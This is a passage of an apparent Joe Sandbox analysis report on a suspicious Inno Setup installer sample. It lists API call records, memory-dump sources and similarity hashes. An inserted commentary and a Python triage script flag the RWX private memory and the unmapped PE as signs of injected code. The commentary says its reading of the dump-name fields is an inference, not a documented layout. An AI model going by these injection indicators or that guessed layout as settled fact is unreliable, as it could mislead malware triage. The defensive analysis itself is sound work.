                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentCursorMessageThreadTimerWait
                                                                                    • String ID: $/Z$D0f
                                                                                    • API String ID: 3909455694-26430867
                                                                                    • Opcode ID: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
                                                                                    • Instruction ID: e22e41007f1cd188d3129f5814c38c56834451e257cf5d477a750d23bbd2f832
                                                                                    • Opcode Fuzzy Hash: d78b845be59367d3e209cbd22b0e30c63a83b27645a5c60fd08de3d69e42f648
                                                                                    • Instruction Fuzzy Hash: F4415E30A04248EFDB51DFA8D896B9DBBF6FB46318F5584A9F804A7291C7B45F44CB20
                                                                                    APIs
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006505BC,?,?,00000000), ref: 0065034E
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                      • Part of subcall function 00421594: SetCurrentDirectoryW.KERNEL32(00000000,?,00650376,00000000,00650583,?,?,00000005,00000000,006505BC,?,?,00000000), ref: 0042159F
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                    • String ID: .dat$.msg$IMsg$Uninstall
                                                                                    • API String ID: 3312786188-1660910688
                                                                                    • Opcode ID: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction ID: f4c181762cbf351847136a24d252f6132ab9ebf6a138c6ef489f4fabac20360c
                                                                                    • Opcode Fuzzy Hash: 062fbde91890a9c7c71bdbdaff0e6b149ef8273d17b618ac53844c83cbed721d
                                                                                    • Instruction Fuzzy Hash: 5A416F34A006099FD700EFA8CD569AEBFB6FB89300F508465F900B7791DA75AE05DF51
                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644527
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006445EE,?,?,00000005,00000000,00000000,?,00650C25,00000000,00650DD8,?,00000000,00650E3C), ref: 00644530
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup
                                                                                    • API String ID: 1375471231-2952887711
                                                                                    • Opcode ID: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction ID: 8551b8634482954e3fd0c2332de757f57d69561d22e1e83ac04cf94fc86de4b6
                                                                                    • Opcode Fuzzy Hash: cac10ad592e500dbc9321eb5b0c6fa4350d4f5f3ada15836020bf4f1a565dd9d
                                                                                    • Instruction Fuzzy Hash: 29411074A001099BDB04EFA5D886ADEB7B7EF89304F50417AF400B7392DE74AE05CB69
                                                                                    APIs
                                                                                      • Part of subcall function 0040EC94: GetModuleHandleW.KERNEL32(00000000,?,0065C4B7), ref: 0040ECA0
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0065C4C7
                                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0065C4E3
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0065C528), ref: 0065C4F8
                                                                                      • Part of subcall function 00651170: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0065C502,00000001,00000000,0065C528), ref: 0065117A
                                                                                      • Part of subcall function 005A2F2C: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005A2F51
                                                                                      • Part of subcall function 005A2A3C: SetWindowTextW.USER32(?,00000000), ref: 005A2A6D
                                                                                    • ShowWindow.USER32(?,00000005,00000000,0065C528), ref: 0065C562
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup
                                                                                    • API String ID: 1533765661-3839654196
                                                                                    • Opcode ID: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction ID: 1b4fd68c5f12b7e95b75c71ee5b84b9948103f9578c114e64c2b51bfeab17fc8
                                                                                    • Opcode Fuzzy Hash: f8c58ef73216a5b498c7f1e6a965958284e2f0dd262b70c0fb50f6e5d3e4fcef
                                                                                    • Instruction Fuzzy Hash: 63218134204B02AFC300EF69DC96D567BEAFB4B360B1155B5F900CB7B1DAB4A850CB64
                                                                                    APIs
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000004FF), ref: 00619AEE
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00619B11
                                                                                    • CloseHandle.KERNEL32(?,00619B44,000000FF,000004FF,00000000,00619B3D), ref: 00619B37
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                    • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                    • API String ID: 2573145106-3235461205
                                                                                    • Opcode ID: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction ID: 17f76d570b79bce70c84d933d727bccac0e9e9e67c25deff2b623aab18eb49ef
                                                                                    • Opcode Fuzzy Hash: 242899fcc0be58cbc3ab360f2b663c78cae9d5b9790535ea214d61b29f3b34d3
                                                                                    • Instruction Fuzzy Hash: 0C01F730708209AFDB10DBACDC62DEE77EAEB85724F140570F510C73D0DA38AD809625
                                                                                    APIs
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 0040566B
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405671
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000105,?), ref: 00405680
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,00000105,?), ref: 00405691
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory
                                                                                    • String ID: :
                                                                                    • API String ID: 1611563598-336475711
                                                                                    • Opcode ID: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction ID: dce63c72c99c25e19be56c3ef1376a95404931ccd87f5083cd5fd4336c869f13
                                                                                    • Opcode Fuzzy Hash: cfe5adf384c6779782b3d8b12f3b8a0230f146eb02df9a283bc8ffd2dbd2e46c
                                                                                    • Instruction Fuzzy Hash: 94F0F061140B447AD320EB65C852AEB72DCDF44305F40883F7AC8D73D2E67E8948976A
                                                                                    APIs
                                                                                    • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
                                                                                    • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011A7B
                                                                                    • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 10011ACC
                                                                                    • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011AFD
                                                                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmp
                                                                                     • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                    • String ID:
                                                                                    • API String ID: 1074265955-0
                                                                                    • Opcode ID: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction ID: f3b0000acd429ac5cb95c2efd876261dd8ef2d3ed187a2a6324a5f7f02af080d
                                                                                    • Opcode Fuzzy Hash: 5ddc3c7a704c1f435e1f2cf7b7af9729b09afe2cf8c3f8fc50bc04272bbf712c
                                                                                    • Instruction Fuzzy Hash: 9E41B075A04249EFDB48CF98C885ADEBBB5FF88314F10C559E92A9B250D774EA80CF50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: dllmain_raw$Main@12
                                                                                    • String ID:
                                                                                    • API String ID: 2964726511-0
                                                                                    • Opcode ID: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                    • Instruction ID: 7ff2abd48b4d900504fcc8e3813c717a712c652835fe495ec6759c63a16bfd3e
                                                                                    • Opcode Fuzzy Hash: 77c2d8ce7624c59a58bc0892d1e6724f43cbeeb330e080506059902503b60b19
                                                                                    • Instruction Fuzzy Hash: 55219271E21299AFDB219F17CC41E6F7A69EBB0BD4F158129F82967214D3308E41ABD0
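The record just above is the one worth pausing on in this section: its code at 0x00CD0000 is dumped with "based on PE: false" and a protection field of 0x40, and the only symbol the IDA plugin could attach is dllmain_raw$Main@12, while the 0x10000000 module a few records up has a PE header but a type field of 0x00020000 rather than the 0x01000000 seen on the 0x00400000 installer image. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox tooling: a small parser for the function records on this page that extracts each function's API calls, its memory-dump source and its Similarity fields, and labels where the code lives. It assumes (an inference from the values on the page, not a documented layout) that the dotted .sdmp name carries the region's base, then the Win32 page protection, then two fields of which the third-from-last is the MEMORY_BASIC_INFORMATION type; the constructed SAMPLE is copied from the records above with argument lists shortened and two 0x00400000 functions merged into one record. The regexes tolerate the page's leading indentation, so the parser can be pointed at the raw extracted text as well.

```python
"""Parse the Joe Sandbox function records on this page ('APIs', 'Memory Dump
Source' and 'Similarity' groups) and label where each function's code lives.
Added example; not Joe Sandbox's own tooling."""
import re
from dataclasses import dataclass, field

# winnt.h constants.  The dotted .sdmp name is read here as
# <proc>.<phase>.<id>.<base>.<protect>.<?>.<type>.<?>: an inference from the
# values on the page (0x20/0x40 are PAGE_* values, 0x01000000/0x00020000 are
# MEM_IMAGE/MEM_PRIVATE), not a documented Joe Sandbox layout.
PAGE_EXECUTE_READWRITE = 0x40
MEM_IMAGE = 0x01000000
MEM_PRIVATE = 0x00020000

API_RE = re.compile(r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"(.+?),?\s*ref:\s*([0-9A-F]+)\s*$")
SRC_RE = re.compile(r"Source File:\s*(\S+)\.sdmp,\s*Offset:\s*([0-9A-F]+),"
                    r"\s*based on PE:\s*(true|false)")
KV_RE = re.compile(r"^\s*•\s*(API ID|String ID|Opcode ID|Instruction Fuzzy Hash):\s*(.*?)\s*$")


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)   # (api, module, ref) tuples
    base: int = 0
    protect: int = 0
    mem_type: int = 0
    pe_backed: bool = False
    meta: dict = field(default_factory=dict)

    def verdict(self):
        """Where this code executes from, for triage ordering."""
        if self.mem_type == MEM_IMAGE:
            return "image"                    # mapped by the OS loader
        if self.pe_backed:
            return "pe-in-private-memory"     # PE layout the loader never mapped
        if self.protect == PAGE_EXECUTE_READWRITE:
            return "rwx-private-code"         # no PE header, writable + executable
        return "private-code"


def parse_records(text):
    """Split report text into records; one starts at each 'APIs' header, or at a
    'Memory Dump Source' header when the current record already has a source."""
    records, cur = [], None
    for line in text.splitlines():
        head = line.strip()
        if head == "APIs" or (head == "Memory Dump Source" and (cur is None or cur.mem_type)):
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None:
            continue
        if (m := API_RE.match(line)):
            symbol = m.group(1).split("(", 1)[0]     # drop the argument list
            api, module = symbol.rsplit(".", 1)      # "GetLastError.KERNEL32"
            cur.calls.append((api, module, m.group(2)))
        elif (m := SRC_RE.search(line)):
            parts = m.group(1).split(".")
            cur.base = int(m.group(2), 16)
            cur.protect = int(parts[4], 16)
            cur.mem_type = int(parts[6], 16)
            cur.pe_backed = m.group(3) == "true"
        elif (m := KV_RE.match(line)):
            cur.meta[m.group(1)] = m.group(2)
    return records


def triage(text):
    """(base, verdict, call count, API ID) per record, most suspicious first."""
    order = {"rwx-private-code": 0, "private-code": 1, "pe-in-private-memory": 2, "image": 3}
    rows = [(r.base, r.verdict(), len(r.calls), r.meta.get("API ID", ""))
            for r in parse_records(text)]
    return sorted(rows, key=lambda row: (order[row[1]], row[0]))


# Constructed input: lines copied from the records on this page, argument lists
# shortened and two 0x00400000 functions merged into one record for brevity.
SAMPLE = r"""
APIs
• GetLastError.KERNEL32(00000000,00000000), ref: 00644530
• GetCurrentThreadId.KERNEL32 ref: 005A0B4B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDirectoryErrorLast
• String ID: Created temporary directory: $\_setup64.tmp$_isetup
APIs
• ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 10011A61
• fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 10011B2C
Memory Dump Source
• Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
APIs
Memory Dump Source
• Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
Similarity
• API ID: dllmain_raw$Main@12
"""

if __name__ == "__main__":
    for base, verdict, n_calls, api_id in triage(SAMPLE):
        print(f"{base:08X}  {verdict:22s} calls={n_calls:<2d} {api_id}")
```

Run over the SAMPLE, the 0x00CD0000 record sorts first as rwx-private-code and the 0x10000000 module as pe-in-private-memory; the Inno Setup stub at 0x00400000 is a plain loader-mapped image. Loader-mapped modules are always MEM_IMAGE, so a PE header sitting in MEM_PRIVATE memory means something other than the loader put it there, which is the check a triage script should surface before anyone reads the 0x00400000 installer functions that make up most of this listing.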
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction ID: 7ced4f6ac72d4b624eb87d8c68b941b316f9879e7a3a6f593d5052ea882bc33a
                                                                                    • Opcode Fuzzy Hash: cf7bdf9da67ecc928336aab066482e6213c2e24160aca79d3e9667660882f776
                                                                                    • Instruction Fuzzy Hash: D411A230A0029A9ADB307B3A595AB9A3F88BF81758F040429BD01FF246EE74DC5587A0
                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FA4
                                                                                    • GetLastError.KERNEL32(00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00420FB3
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000,00000000), ref: 00420FBB
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FD6
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,0066978C,?,00650DE7,00000000,00650E3C,?,?,00000005,?,00000000,00000000), ref: 00420FE4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    • Opcode ID: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction ID: 6ebe3b4cf45532d28852752088064c3a0fe5d7edeb4f0602fc5494761cc484af
                                                                                    • Opcode Fuzzy Hash: abb7752b3b6d9ecc2b71773dca15c327e56584de84a87eac260585061ca53039
                                                                                    • Instruction Fuzzy Hash: 43F0A7613843211D9630397E29C9EFF158C894276DB55073FFA50D22A3C59D5D4A816E
                                                                                    APIs
                                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005A0B1A
                                                                                    • SetEvent.KERNEL32(00000000), ref: 005A0B46
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 005A0B4B
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 005A0B74
                                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005A0B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmp
